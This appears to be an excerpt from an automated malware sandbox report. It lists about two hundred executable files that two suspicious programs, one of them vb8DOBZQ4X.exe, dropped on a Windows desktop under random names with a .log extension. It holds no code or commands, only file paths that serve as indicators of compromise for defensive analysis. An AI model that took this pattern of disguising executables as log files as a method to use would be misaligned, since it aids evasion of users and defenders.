Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yGbhhxRG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RMYUaxxv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qVSxnNNB.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fMYqQhPK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cttYUELd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gsThGkmc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cJprnBzi.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HzekDlJr.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JcGsBzAN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mwiZumHK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iPKZlQUF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CGYwsYXe.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BoVNXGRv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LLCKvMGi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wNvWPtSq.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hJupzWZv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\keuZOuus.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lbnIQCXF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UqASurOe.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eQfHOZnx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KsQEGBOR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qUjZTVbT.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rpuWqKyh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DCRfugzr.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KeYvlRxi.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aCjqmULK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\thNpVJYz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gZGZiBsl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yjTManQC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WWrklrjU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UFHtrLcK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WLgLezrK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CdYNaVtP.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\edcYVUJp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VPbJhuHo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PKGckfmR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\agdAFVnw.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jDxFqWCl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zVsflLNl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mxRxOeus.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JgaLgwjq.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YRuAcrMJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oPLHggMU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BuzfybGV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AqtFBGCA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NZaMcRbY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RvvRuIkR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aykSTqhz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NlkveJFZ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QVwUKkQs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\btCRzSEF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mjqRZCrc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AxYXcbrb.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ImrlTNzS.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lhRaqYLf.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oMSZXQhy.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TxiAPspM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JmWFnalj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EkqWFYHP.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jFYrMCHr.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bmXzZwPf.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\njEJMHQa.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XNoagVJo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jZepcAzi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wEdgRRFC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\drzBFnSx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ROyAPbqA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wHQFpXeP.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BHGUMQKM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TMGCsTQL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tFeWToZU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qSDeLdQE.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XGbZsHvp.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WVQzPKeN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NNotRvLd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fGerwGnb.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DoxmDQeC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xxeWQJRC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hcChGAko.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xhSmheyM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LVVbmwlM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nXdxeIZI.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uGVdoafs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oSxqxmWY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EzneeVJd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xYDfcGYs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aIOINqAk.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XIqsTrtm.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kgEiDTmg.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XaxKhNmp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GBZNzENY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wlwnypob.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GrbctlpV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tLIouJOv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RVLBDpEA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rLgPOzBo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mRjyKgxZ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hlfqcyJu.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YgrJBoPX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AGiVvpLm.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aMLzISkQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FeLEeCSo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MXCVunwb.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PSpuOONW.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SYRbALIV.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zNmcoJTF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\elMqzDku.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rNlQSMnT.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oVcWqdBJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GyndizDU.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zVWvTsuK.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CVklKbNA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iTpzukdJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qaPgAreD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JjTtpNNN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bQoBpJni.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lflgjgBQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\anISgrcX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FuAUYlaa.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FOzUwYyz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xTpVjUvY.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iGWxVWoq.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BspVIDPh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZdSRXoeS.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CmCLCTge.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RzKbnuOl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XoYqWopG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QhHtScIC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kdLAuCIK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lSDqlTwz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kAqpsefy.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hkwSIGWM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PYUMpkBx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ktNSFLQh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PUjRdfFC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XKvsXEeS.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aQaJCENj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bjaIeUfz.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sYivqdzV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GYueqmCN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nMwoFxOX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bCZRjEXC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fuVIuOJa.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uRCnOlqd.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uaVdMMER.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PezePGqX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OcccncZk.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FxxLTNKF.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\juaFGjjo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GLflDjTD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BlGuwWUx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CuOMrhud.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\imWxxkPR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tQGWHnew.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GhHLDCKr.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xiXwTpDV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FvgOgdlp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\taBnhvKz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kzHRZmsQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zWbEFDzT.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tmQVayIT.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vfCpeOMs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DnOOjYsU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\USABMust.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iNKhTOoj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VrxiBoaL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wSKhJewJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IySxBMpl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yAaeoIJF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WJARWHgu.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HejUYCZm.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XSrHlKtI.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lStYNxlh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nvPhTzIk.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FHqnnVdz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YlzzsoEA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\byyKGwGy.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vtdVTqPJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CoiFKLru.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NZJkwJOG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LieVinBD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GTPDiSuI.log	Jump to dropped file
